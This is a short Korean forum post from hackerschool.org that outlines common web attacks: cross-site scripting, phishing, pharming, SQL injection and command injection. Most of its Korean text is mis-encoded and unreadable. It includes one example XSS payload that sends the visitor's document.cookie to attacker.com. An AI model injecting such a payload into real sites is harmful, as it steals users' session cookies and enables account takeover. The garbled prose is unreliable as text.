|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1829 [º¹»ç]
1. Web hacking À¯Çü
Cross-Site Scripting(XSS)
°ø°Ý´ë»ó »çÀÌÆ®¿¡ °ø°ÝÀÚ »çÀÌÆ®¸¦ Å©·Î½º(°ÉÃļ)½ÃÄѼ °ø°ÝÇÏ´Â ¹æ¹ý
<Cookie »©³»±â °ø°Ý ¿¹>
<script>document.location="http://attacker.com/attack/cookie attack.php?query="+document.cookie</script>
(À¥ ÆäÀÌÁö¿¡ ¾Ç¼ºÄڵ带 »ðÀÔÇÏ¿© Á¢±ÙÇϴ Ŭ¶óÀ̾ðÆ®¿¡ ÀÚµ¿½ÇÇà)
ÇÇ½Ì : °ø°ÝÀÚ°¡ Çǽ̸ÞÀÏÀ» ¹ß¼Û > victimÀÌ À̸ÞÀÏ ³»¿ë¿¡ ÇöȤ > ¸µÅ©µÇ¾î ÀÖ´Â »çÀÌÆ®¸¦ Ŭ¸¯
vkald : dnsÁ¶ÀÛÀ» ÅëÇÑ ÇÇ½Ì ¾÷±×·¹ÀÌµå ¹öÀü (web firewall¿¡¼ Â÷´Ü ºÒ°¡´É)
Çǽ̰ú ÆĹÖÀÌ ¹®Á¦°¡ µÇ°íÀÖ´Â ±î´ß? < money >
SQL Injection
À¥ ¾ÖÇø®ÄÉÀ̼ǿ¡ ÀǵµÀûÀ¸·Î SQL¹®À» »ðÀÔÇÏ¿© ·Î±×ÀÎ ÀÎÁõ°úÁ¤À» ¿ìȸÇϰųª °ø°ÝÀÚ°¡ ¾ÇÀÇÀûÀÎ Äõ¸®¹®À» DB¿¡ º¸³»¾î ¹®Á¦¸¦ ¹ß»ý½ÃÅ´ (DBÁ¤º¸ À¯Ãâ¿¡¼ Æ÷¸ä±îÁö ´Ù¾çÇÑ °ø°Ý°¡´É) À¥ ÇØÅ·Áß °¡Àå °·ÂÇÑ°ø°Ý
Command Injection
À¥ ¾ÖÇø®ÄÉÀ̼ǿ¡¼ HTML Çü½ÄÀ̳ª ÄíÅ°, URL ÆĶó¹ÌÅÍ Çü½ÄÀ¸·Î ½Ã½ºÅÛ ¸í·É¾î¸¦ »ðÀÔ Çã¿ëÇÔÀ¸·Î½á À¥ »ó¿¡¼µµ ½Ã½ºÅÛ ¸í·ÉÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡ |
Hit : 10040 Date : 2011/08/03 01:13
|
1619, 
1/81 
